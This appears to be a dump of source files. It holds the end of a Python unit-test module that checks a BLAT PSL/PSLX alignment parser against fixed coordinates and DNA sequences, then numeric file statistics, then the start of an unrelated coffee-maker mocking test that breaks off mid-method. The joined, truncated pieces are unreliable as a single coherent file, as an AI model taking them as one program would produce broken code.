self.assertEqual(183926028, hsp.hit_end)
self.assertEqual(2, len(hsp))
self.assertEqual([6, 38], hsp.query_span_all)
self.assertEqual([6, 38], hsp.hit_span_all)
self.assertEqual([(1, 7), (11, 49)], hsp.query_range_all)
self.assertEqual([(183925984, 183925990), (183925990, 183926028)], hsp.hit_range_all)
# first qresult, fourth hit, second hsp
hsp = qresult[3].hsps[1]
self.assertEqual(35, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(1, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(13, hsp.query_start)
self.assertEqual(120641740, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(120641776, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([36], hsp.query_span_all)
self.assertEqual([36], hsp.hit_span_all)
self.assertEqual([(13, 49)], hsp.query_range_all)
self.assertEqual([(120641740, 120641776)], hsp.hit_range_all)
# first qresult, fifth hit
hit = qresult[4]
self.assertEqual('chr19', hit.id)
self.assertEqual(59128983, hit.seq_len)
self.assertEqual(3, len(hit.hsps))
# first qresult, fifth hit, first hsp
hsp = qresult[4].hsps[0]
self.assertEqual(34, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(2, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(1, hsp.hit_gapopen_num)
self.assertEqual(134, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(10, hsp.query_start)
self.assertEqual(35483340, hsp.hit_start)
self.assertEqual(46, hsp.query_end)
self.assertEqual(35483510, hsp.hit_end)
self.assertEqual(2, len(hsp))
self.assertEqual([25, 11], hsp.query_span_all)
self.assertEqual([25, 11], hsp.hit_span_all)
self.assertEqual([(10, 35), (35, 46)], hsp.query_range_all)
self.assertEqual([(35483340, 35483365), (35483499, 35483510)], hsp.hit_range_all)
# first qresult, fifth hit, second hsp
hsp = qresult[4].hsps[1]
self.assertEqual(39, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(10, hsp.query_start)
self.assertEqual(54017130, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(54017169, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([39], hsp.query_span_all)
self.assertEqual([39], hsp.hit_span_all)
self.assertEqual([(10, 49)], hsp.query_range_all)
self.assertEqual([(54017130, 54017169)], hsp.hit_range_all)
# first qresult, fifth hit, third hsp
hsp = qresult[4].hsps[2]
self.assertEqual(36, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(3, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(10, hsp.query_start)
self.assertEqual(553742, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(553781, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([39], hsp.query_span_all)
self.assertEqual([39], hsp.hit_span_all)
self.assertEqual([(10, 49)], hsp.query_range_all)
self.assertEqual([(553742, 553781)], hsp.hit_range_all)
def test_psl_34_005(self, testf='psl_34_005.psl', pslx=False):
"""Test parsing blat output (psl_34_005.psl)"""
blat_file = get_file(testf)
self.qresults = list(parse(blat_file, FMT, pslx=pslx))
self.assertEqual(2, len(self.qresults))
# check common attributes
for qresult in self.qresults:
for hit in qresult:
self.assertEqual(qresult.id, hit.query_id)
for hsp in hit:
self.assertEqual(hit.id, hsp.hit_id)
self.assertEqual(qresult.id, hsp.query_id)
# test first qresult
qresult = self.qresults[0]
self.assertEqual('hg18_dna', qresult.id)
self.assertEqual('blat', qresult.program)
self.assertEqual(33, qresult.seq_len)
self.assertEqual(3, len(qresult))
# first qresult, first hit
hit = qresult[0]
self.assertEqual('chr4', hit.id)
self.assertEqual(191154276, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual(16, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(11, hsp.query_start)
self.assertEqual(61646095, hsp.hit_start)
self.assertEqual(27, hsp.query_end)
self.assertEqual(61646111, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([16], hsp.query_span_all)
self.assertEqual([16], hsp.hit_span_all)
self.assertEqual([(11, 27)], hsp.query_range_all)
self.assertEqual([(61646095, 61646111)], hsp.hit_range_all)
# first qresult, second hit
hit = qresult[1]
self.assertEqual('chr1', hit.id)
self.assertEqual(249250621, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual(33, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(0, hsp.query_start)
self.assertEqual(10271783, hsp.hit_start)
self.assertEqual(33, hsp.query_end)
self.assertEqual(10271816, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([33], hsp.query_span_all)
self.assertEqual([33], hsp.hit_span_all)
self.assertEqual([(0, 33)], hsp.query_range_all)
self.assertEqual([(10271783, 10271816)], hsp.hit_range_all)
# first qresult, third hit
hit = qresult[2]
self.assertEqual('chr2', hit.id)
self.assertEqual(243199373, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual(17, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(8, hsp.query_start)
self.assertEqual(53575980, hsp.hit_start)
self.assertEqual(25, hsp.query_end)
self.assertEqual(53575997, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([17], hsp.query_span_all)
self.assertEqual([17], hsp.hit_span_all)
self.assertEqual([(8, 25)], hsp.query_range_all)
self.assertEqual([(53575980, 53575997)], hsp.hit_range_all)
# test second qresult
qresult = self.qresults[1]
self.assertEqual('hg19_dna', qresult.id)
self.assertEqual('blat', qresult.program)
self.assertEqual(50, qresult.seq_len)
self.assertEqual(10, len(qresult))
# second qresult, first hit
hit = qresult[0]
self.assertEqual('chr9', hit.id)
self.assertEqual(141213431, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# second qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual(38, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(3, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(9, hsp.query_start)
self.assertEqual(85737865, hsp.hit_start)
self.assertEqual(50, hsp.query_end)
self.assertEqual(85737906, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([41], hsp.query_span_all)
self.assertEqual([41], hsp.hit_span_all)
self.assertEqual([(9, 50)], hsp.query_range_all)
self.assertEqual([(85737865, 85737906)], hsp.hit_range_all)
# second qresult, second hit
hit = qresult[1]
self.assertEqual('chr8', hit.id)
self.assertEqual(146364022, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# second qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual(41, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(8, hsp.query_start)
self.assertEqual(95160479, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(95160520, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([41], hsp.query_span_all)
self.assertEqual([41], hsp.hit_span_all)
self.assertEqual([(8, 49)], hsp.query_range_all)
self.assertEqual([(95160479, 95160520)], hsp.hit_range_all)
# second qresult, third hit
hit = qresult[2]
self.assertEqual('chr22', hit.id)
self.assertEqual(51304566, hit.seq_len)
self.assertEqual(2, len(hit.hsps))
# second qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual(33, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(3, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(11, hsp.query_start)
self.assertEqual(42144400, hsp.hit_start)
self.assertEqual(47, hsp.query_end)
self.assertEqual(42144436, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([36], hsp.query_span_all)
self.assertEqual([36], hsp.hit_span_all)
self.assertEqual([(11, 47)], hsp.query_range_all)
self.assertEqual([(42144400, 42144436)], hsp.hit_range_all)
# second qresult, third hit, second hsp
hsp = qresult[2].hsps[1]
self.assertEqual(35, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(2, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(12, hsp.query_start)
self.assertEqual(48997405, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(48997442, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([37], hsp.query_span_all)
self.assertEqual([37], hsp.hit_span_all)
self.assertEqual([(12, 49)], hsp.query_range_all)
self.assertEqual([(48997405, 48997442)], hsp.hit_range_all)
# second qresult, fourth hit
hit = qresult[3]
self.assertEqual('chr2', hit.id)
self.assertEqual(243199373, hit.seq_len)
self.assertEqual(2, len(hit.hsps))
# second qresult, fourth hit, first hsp
hsp = qresult[3].hsps[0]
self.assertEqual(43, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(1, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(1, hsp.query_gapopen_num)
self.assertEqual(4, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(1, hsp.query_start)
self.assertEqual(183925984, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(183926028, hsp.hit_end)
self.assertEqual(2, len(hsp))
self.assertEqual([6, 38], hsp.query_span_all)
self.assertEqual([6, 38], hsp.hit_span_all)
self.assertEqual([(1, 7), (11, 49)], hsp.query_range_all)
self.assertEqual([(183925984, 183925990), (183925990, 183926028)], hsp.hit_range_all)
# second qresult, fourth hit, second hsp
hsp = qresult[3].hsps[1]
self.assertEqual(35, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(1, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(13, hsp.query_start)
self.assertEqual(120641740, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(120641776, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([36], hsp.query_span_all)
self.assertEqual([36], hsp.hit_span_all)
self.assertEqual([(13, 49)], hsp.query_range_all)
self.assertEqual([(120641740, 120641776)], hsp.hit_range_all)
# second qresult, fifth hit
hit = qresult[4]
self.assertEqual('chr19', hit.id)
self.assertEqual(59128983, hit.seq_len)
self.assertEqual(3, len(hit.hsps))
# second qresult, fifth hit, first hsp
hsp = qresult[4].hsps[0]
self.assertEqual(34, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(2, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(1, hsp.hit_gapopen_num)
self.assertEqual(134, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(10, hsp.query_start)
self.assertEqual(35483340, hsp.hit_start)
self.assertEqual(46, hsp.query_end)
self.assertEqual(35483510, hsp.hit_end)
self.assertEqual(2, len(hsp))
self.assertEqual([25, 11], hsp.query_span_all)
self.assertEqual([25, 11], hsp.hit_span_all)
self.assertEqual([(10, 35), (35, 46)], hsp.query_range_all)
self.assertEqual([(35483340, 35483365), (35483499, 35483510)], hsp.hit_range_all)
# second qresult, fifth hit, second hsp
hsp = qresult[4].hsps[1]
self.assertEqual(39, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(10, hsp.query_start)
self.assertEqual(54017130, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(54017169, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([39], hsp.query_span_all)
self.assertEqual([39], hsp.hit_span_all)
self.assertEqual([(10, 49)], hsp.query_range_all)
self.assertEqual([(54017130, 54017169)], hsp.hit_range_all)
# second qresult, fifth hit, third hsp
hsp = qresult[4].hsps[2]
self.assertEqual(36, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(3, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(10, hsp.query_start)
self.assertEqual(553742, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(553781, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([39], hsp.query_span_all)
self.assertEqual([39], hsp.hit_span_all)
self.assertEqual([(10, 49)], hsp.query_range_all)
self.assertEqual([(553742, 553781)], hsp.hit_range_all)
class BlatPslxCases(BlatPslCases):
def test_pslx_34_001(self, testf='pslx_34_001.pslx'):
"""Test parsing blat output (pslx_34_001.pslx)"""
BlatPslCases.test_psl_34_001(self, 'pslx_34_001.pslx', pslx=True)
# test first qresult
qresult = self.qresults[0]
# first qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual('aggtaaactgccttca', str(hsp.query_all[0].seq))
self.assertEqual('aggtaaactgccttca', str(hsp.hit_all[0].seq))
# first qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual('atgagcttccaaggtaaactgccttcaagattc', str(hsp.query_all[0].seq))
self.assertEqual('atgagcttccaaggtaaactgccttcaagattc', str(hsp.hit_all[0].seq))
# first qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual('aaggcagtttaccttgg', str(hsp.query_all[0].seq))
self.assertEqual('aaggcagtttaccttgg', str(hsp.hit_all[0].seq))
# test second qresult
qresult = self.qresults[1]
# second qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual('acaaaggggctgggcgtggtggctcacacctgtaatcccaa', str(hsp.query_all[0].seq))
self.assertEqual('acaaaggggctgggcgcagtggctcacgcctgtaatcccaa', str(hsp.hit_all[0].seq))
# second qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual('cacaaaggggctgggcgtggtggctcacacctgtaatccca', str(hsp.query_all[0].seq))
self.assertEqual('cacaaaggggctgggcgtggtggctcacacctgtaatccca', str(hsp.hit_all[0].seq))
# second qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual('aaaggggctgggcgtggtggctcacacctgtaatcc', str(hsp.query_all[0].seq))
self.assertEqual('aaaggggctgggcgtggtagctcatgcctgtaatcc', str(hsp.hit_all[0].seq))
# second qresult, third hit, second hsp
hsp = qresult[2].hsps[1]
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctt', str(hsp.query_all[0].seq))
self.assertEqual('tgggattacaggcgggagccaccacgcccagcccctt', str(hsp.hit_all[0].seq))
# second qresult, fourth hit, first hsp
hsp = qresult[3].hsps[0]
self.assertEqual('aaaaat', str(hsp.query_all[0].seq))
self.assertEqual('aaaaat', str(hsp.hit_all[0].seq))
self.assertEqual('aaaggggctgggcgtggtggctcacacctgtaatccca', str(hsp.query_all[1].seq))
self.assertEqual('aaaggggctgggcgtggtggctcacgcctgtaatccca', str(hsp.hit_all[1].seq))
# second qresult, fourth hit, second hsp
hsp = qresult[3].hsps[1]
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccct', str(hsp.query_all[0].seq))
self.assertEqual('tgggattacaggcgtgagccaccacgcccagcccct', str(hsp.hit_all[0].seq))
# second qresult, fifth hit, first hsp
hsp = qresult[4].hsps[0]
self.assertEqual('caaaggggctgggcgtggtggctca', str(hsp.query_all[0].seq))
self.assertEqual('caaaggggctgggcgtagtggctga', str(hsp.hit_all[0].seq))
self.assertEqual('cacctgtaatc', str(hsp.query_all[1].seq))
self.assertEqual('cacctgtaatc', str(hsp.hit_all[1].seq))
# second qresult, fifth hit, second hsp
hsp = qresult[4].hsps[1]
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctttg', str(hsp.query_all[0].seq))
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctttg', str(hsp.hit_all[0].seq))
# second qresult, fifth hit, third hsp
hsp = qresult[4].hsps[2]
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctttg', str(hsp.query_all[0].seq))
self.assertEqual('tgggatgacaggggtgaggcaccacgcccagcccctttg', str(hsp.hit_all[0].seq))
def test_pslx_34_002(self, testf='pslx_34_002.pslx'):
"""Test parsing blat output (pslx_34_002.pslx)"""
BlatPslCases.test_psl_34_002(self, 'pslx_34_002.pslx', pslx=True)
def test_pslx_34_003(self, testf='pslx_34_003.pslx'):
"""Test parsing blat output (pslx_34_003.pslx)"""
BlatPslCases.test_psl_34_003(self, 'pslx_34_003.pslx', pslx=True)
# test first qresult
qresult = self.qresults[0]
# first qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual('aggtaaactgccttca', str(hsp.query_all[0].seq))
self.assertEqual('aggtaaactgccttca', str(hsp.hit_all[0].seq))
# first qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual('atgagcttccaaggtaaactgccttcaagattc', str(hsp.query_all[0].seq))
self.assertEqual('atgagcttccaaggtaaactgccttcaagattc', str(hsp.hit_all[0].seq))
# first qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual('aaggcagtttaccttgg', str(hsp.query_all[0].seq))
self.assertEqual('aaggcagtttaccttgg', str(hsp.hit_all[0].seq))
def test_pslx_34_004(self, testf='pslx_34_004.pslx'):
"""Test parsing blat output (pslx_34_004.pslx)"""
BlatPslCases.test_psl_34_004(self, 'pslx_34_004.pslx', pslx=True)
# test first qresult
qresult = self.qresults[0]
# first qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual('acaaaggggctgggcgtggtggctcacacctgtaatcccaa', str(hsp.query_all[0].seq))
self.assertEqual('acaaaggggctgggcgcagtggctcacgcctgtaatcccaa', str(hsp.hit_all[0].seq))
# first qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual('cacaaaggggctgggcgtggtggctcacacctgtaatccca', str(hsp.query_all[0].seq))
self.assertEqual('cacaaaggggctgggcgtggtggctcacacctgtaatccca', str(hsp.hit_all[0].seq))
# first qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual('aaaggggctgggcgtggtggctcacacctgtaatcc', str(hsp.query_all[0].seq))
self.assertEqual('aaaggggctgggcgtggtagctcatgcctgtaatcc', str(hsp.hit_all[0].seq))
# first qresult, third hit, second hsp
hsp = qresult[2].hsps[1]
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctt', str(hsp.query_all[0].seq))
self.assertEqual('tgggattacaggcgggagccaccacgcccagcccctt', str(hsp.hit_all[0].seq))
# first qresult, fourth hit, first hsp
hsp = qresult[3].hsps[0]
self.assertEqual('aaaaat', str(hsp.query_all[0].seq))
self.assertEqual('aaaaat', str(hsp.hit_all[0].seq))
self.assertEqual('aaaggggctgggcgtggtggctcacacctgtaatccca', str(hsp.query_all[1].seq))
self.assertEqual('aaaggggctgggcgtggtggctcacgcctgtaatccca', str(hsp.hit_all[1].seq))
# first qresult, fourth hit, second hsp
hsp = qresult[3].hsps[1]
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccct', str(hsp.query_all[0].seq))
self.assertEqual('tgggattacaggcgtgagccaccacgcccagcccct', str(hsp.hit_all[0].seq))
# first qresult, fifth hit, first hsp
hsp = qresult[4].hsps[0]
self.assertEqual('caaaggggctgggcgtggtggctca', str(hsp.query_all[0].seq))
self.assertEqual('caaaggggctgggcgtagtggctga', str(hsp.hit_all[0].seq))
self.assertEqual('cacctgtaatc', str(hsp.query_all[1].seq))
self.assertEqual('cacctgtaatc', str(hsp.hit_all[1].seq))
# first qresult, fifth hit, second hsp
hsp = qresult[4].hsps[1]
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctttg', str(hsp.query_all[0].seq))
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctttg', str(hsp.hit_all[0].seq))
# first qresult, fifth hit, third hsp
hsp = qresult[4].hsps[2]
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctttg', str(hsp.query_all[0].seq))
self.assertEqual('tgggatgacaggggtgaggcaccacgcccagcccctttg', str(hsp.hit_all[0].seq))
def test_pslx_34_005(self, testf='pslx_34_005.pslx'):
"""Test parsing blat output (pslx_34_005.pslx)"""
BlatPslCases.test_psl_34_005(self, 'pslx_34_005.pslx', pslx=True)
# test first qresult
qresult = self.qresults[0]
# first qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual('aggtaaactgccttca', str(hsp.query_all[0].seq))
self.assertEqual('aggtaaactgccttca', str(hsp.hit_all[0].seq))
# first qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual('atgagcttccaaggtaaactgccttcaagattc', str(hsp.query_all[0].seq))
self.assertEqual('atgagcttccaaggtaaactgccttcaagattc', str(hsp.hit_all[0].seq))
# first qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual('aaggcagtttaccttgg', str(hsp.query_all[0].seq))
self.assertEqual('aaggcagtttaccttgg', str(hsp.hit_all[0].seq))
# test second qresult
qresult = self.qresults[1]
# second qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual('acaaaggggctgggcgtggtggctcacacctgtaatcccaa', str(hsp.query_all[0].seq))
self.assertEqual('acaaaggggctgggcgcagtggctcacgcctgtaatcccaa', str(hsp.hit_all[0].seq))
# second qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual('cacaaaggggctgggcgtggtggctcacacctgtaatccca', str(hsp.query_all[0].seq))
self.assertEqual('cacaaaggggctgggcgtggtggctcacacctgtaatccca', str(hsp.hit_all[0].seq))
# second qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual('aaaggggctgggcgtggtggctcacacctgtaatcc', str(hsp.query_all[0].seq))
self.assertEqual('aaaggggctgggcgtggtagctcatgcctgtaatcc', str(hsp.hit_all[0].seq))
# second qresult, third hit, second hsp
hsp = qresult[2].hsps[1]
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctt', str(hsp.query_all[0].seq))
self.assertEqual('tgggattacaggcgggagccaccacgcccagcccctt', str(hsp.hit_all[0].seq))
# second qresult, fourth hit, first hsp
hsp = qresult[3].hsps[0]
self.assertEqual('aaaaat', str(hsp.query_all[0].seq))
self.assertEqual('aaaaat', str(hsp.hit_all[0].seq))
self.assertEqual('aaaggggctgggcgtggtggctcacacctgtaatccca', str(hsp.query_all[1].seq))
self.assertEqual('aaaggggctgggcgtggtggctcacgcctgtaatccca', str(hsp.hit_all[1].seq))
# second qresult, fourth hit, second hsp
hsp = qresult[3].hsps[1]
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccct', str(hsp.query_all[0].seq))
self.assertEqual('tgggattacaggcgtgagccaccacgcccagcccct', str(hsp.hit_all[0].seq))
# second qresult, fifth hit, first hsp
hsp = qresult[4].hsps[0]
self.assertEqual('caaaggggctgggcgtggtggctca', str(hsp.query_all[0].seq))
self.assertEqual('caaaggggctgggcgtagtggctga', str(hsp.hit_all[0].seq))
self.assertEqual('cacctgtaatc', str(hsp.query_all[1].seq))
self.assertEqual('cacctgtaatc', str(hsp.hit_all[1].seq))
# second qresult, fifth hit, second hsp
hsp = qresult[4].hsps[1]
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctttg', str(hsp.query_all[0].seq))
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctttg', str(hsp.hit_all[0].seq))
# second qresult, fifth hit, third hsp
hsp = qresult[4].hsps[2]
self.assertEqual('tgggattacaggtgtgagccaccacgcccagcccctttg', str(hsp.query_all[0].seq))
self.assertEqual('tgggatgacaggggtgaggcaccacgcccagcccctttg', str(hsp.hit_all[0].seq))
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity = 2)
unittest.main(testRunner=runner)
| 47.309991
| 96
| 0.656245
| 7,283
| 55,400
| 4.828505
| 0.029795
| 0.360433
| 0.147415
| 0.119945
| 0.972758
| 0.966701
| 0.966701
| 0.962293
| 0.961668
| 0.958426
| 0
| 0.067211
| 0.22009
| 55,400
| 1,170
| 97
| 47.350427
| 0.746685
| 0.079043
| 0
| 0.968191
| 0
| 0
| 0.057431
| 0.043073
| 0
| 0
| 0
| 0
| 0.83996
| 1
| 0.010934
| false
| 0
| 0.00497
| 0
| 0.018887
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1374143736abf1f0db6e8d4fc54b787cd914931b
| 2,592
|
py
|
Python
|
Mocking/CoffeeMaker/Python/test_integration_code.py
|
jamiemacdonald04/AutomatedTestCentral
|
6be2cdce4441e093a69b58f1931e76bdbdffdc14
|
[
"MIT"
] | null | null | null |
Mocking/CoffeeMaker/Python/test_integration_code.py
|
jamiemacdonald04/AutomatedTestCentral
|
6be2cdce4441e093a69b58f1931e76bdbdffdc14
|
[
"MIT"
] | null | null | null |
Mocking/CoffeeMaker/Python/test_integration_code.py
|
jamiemacdonald04/AutomatedTestCentral
|
6be2cdce4441e093a69b58f1931e76bdbdffdc14
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import MagicMock
from coffee_maker import *
from dry_beans_coffee import *
class TestCofeeSelect(unittest.TestCase):
def test_coffee_no_beans(self):
coffee_select_Mock = MagicMock(AbstractCoffeeSelect)
coffee_select_Mock.get_beans.return_value = 0
coffee_select_Mock.grind_beans.return_value = False
maker = CoffeeMaker(coffee_select_Mock)
coffee = maker.making_coffee()
assert coffee == "No coffee available"
# called with zero arguments
coffee_select_Mock.get_beans.assert_called_with()
# was called once with zero arguments
coffee_select_Mock.get_beans.assert_called_once_with()
# was it called at least once
coffee_select_Mock.get_beans.assert_called()
# was called once only
coffee_select_Mock.get_beans.assert_called_once()
def test_grind_failure(self):
